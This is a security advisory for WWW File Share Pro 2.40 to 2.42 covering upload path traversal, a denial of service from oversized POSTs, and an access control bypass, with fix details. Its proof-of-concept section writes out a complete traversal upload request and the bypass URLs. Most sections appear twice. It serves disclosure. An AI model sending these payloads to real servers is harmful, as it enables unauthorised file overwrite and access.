LionMax Software WWW File Share Pro Multiple Remote Vulnerabilities
BID:9425
Info
LionMax Software WWW File Share Pro Multiple Remote Vulnerabilities
| Bugtraq ID: | 9425 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 14 2004 12:00AM |
| Updated: | Jan 14 2004 12:00AM |
| Credit: | Discovery of these vulnerabilities has been credited to Luigi Auriemma <[email protected]>. |
| Vulnerable: |
LionMax Software WWW File Share Pro 2.42 LionMax Software WWW File Share Pro 2.41 LionMax Software WWW File Share Pro 2.40 |
| Not Vulnerable: |
LionMax Software WWW File Share Pro 2.48 LionMax Software WWW File Share Pro 2.46 |
Discussion
LionMax Software WWW File Share Pro Multiple Remote Vulnerabilities
WWW File Share Pro has been reported prone to multiple remote vulnerabilities.
The first reported issue is that a remote attacker may employ the "upload" functionality of the vulnerable software to overwrite arbitrary files that are writable by the WWW File Share Pro process.
The second issue reported, may allow a remote user to deny service to the affected software. It has been reported that if WWW File Share Pro handles a POST request that contains excessive data it will consume system resources and leave the affected system unresponsive.
The final issue that has been reported regards the access control routines used to control access to directories that are protected by WWW File Share Pro. It has been reported that a remote attacker may invoke a specially crafted HTTP request for the target protected resource and in doing so may bypass access controls.
WWW File Share Pro has been reported prone to multiple remote vulnerabilities.
The first reported issue is that a remote attacker may employ the "upload" functionality of the vulnerable software to overwrite arbitrary files that are writable by the WWW File Share Pro process.
The second issue reported, may allow a remote user to deny service to the affected software. It has been reported that if WWW File Share Pro handles a POST request that contains excessive data it will consume system resources and leave the affected system unresponsive.
The final issue that has been reported regards the access control routines used to control access to directories that are protected by WWW File Share Pro. It has been reported that a remote attacker may invoke a specially crafted HTTP request for the target protected resource and in doing so may bypass access controls.
Exploit / POC
LionMax Software WWW File Share Pro Multiple Remote Vulnerabilities
The following proof of concept exploits were supplied:
POST /upload2.htm HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------00000000000000000000000000000
Content-Length: ignored_by_this_specific_server
-----------------------------00000000000000000000000000000
Content-Disposition: form-data; name="file"; filename="../../../badfile.txt"
Content-Type: text/plain
I'm a bad file in a bad location.
If you see me you are vulnerable because an attacker can upload a malicious file everywhere in your system overwriting any existent file.
Now go to download the latest patch for your webserver or disable the Upload function!
-----------------------------00000000000000000000000000000
Content-Disposition: form-data; name="Submit"
Upload
-----------------------------00000000000000000000000000000--
http://server/directory./
http://server/\directory/
http://server///directory/
"GET \directory/ HTTP/1.0"
The following proof of concept exploits were supplied:
POST /upload2.htm HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------00000000000000000000000000000
Content-Length: ignored_by_this_specific_server
-----------------------------00000000000000000000000000000
Content-Disposition: form-data; name="file"; filename="../../../badfile.txt"
Content-Type: text/plain
I'm a bad file in a bad location.
If you see me you are vulnerable because an attacker can upload a malicious file everywhere in your system overwriting any existent file.
Now go to download the latest patch for your webserver or disable the Upload function!
-----------------------------00000000000000000000000000000
Content-Disposition: form-data; name="Submit"
Upload
-----------------------------00000000000000000000000000000--
http://server/directory./
http://server/\directory/
http://server///directory/
"GET \directory/ HTTP/1.0"
Solution / Fix
LionMax Software WWW File Share Pro Multiple Remote Vulnerabilities
Solution:
These vulnerabilities are addressed in the latest version of WWW File Share Pro.
LionMax Software WWW File Share Pro 2.40
LionMax Software WWW File Share Pro 2.41
LionMax Software WWW File Share Pro 2.42
Solution:
These vulnerabilities are addressed in the latest version of WWW File Share Pro.
LionMax Software WWW File Share Pro 2.40
-
LionMax Software WWW File Share Pro 2.48
http://www.wfshome.com/download/wfspsetup.exe
LionMax Software WWW File Share Pro 2.41
-
LionMax Software WWW File Share Pro 2.48
http://www.wfshome.com/download/wfspsetup.exe
LionMax Software WWW File Share Pro 2.42
-
LionMax Software WWW File Share Pro 2.48
http://www.wfshome.com/download/wfspsetup.exe
References
LionMax Software WWW File Share Pro Multiple Remote Vulnerabilities
References:
References:
- WWW File Share Pro Product Page (LionMax Software)
- Multiple vulnerabilities in WWW Fileshare Pro <= 2.42 (Luigi Auriemma
)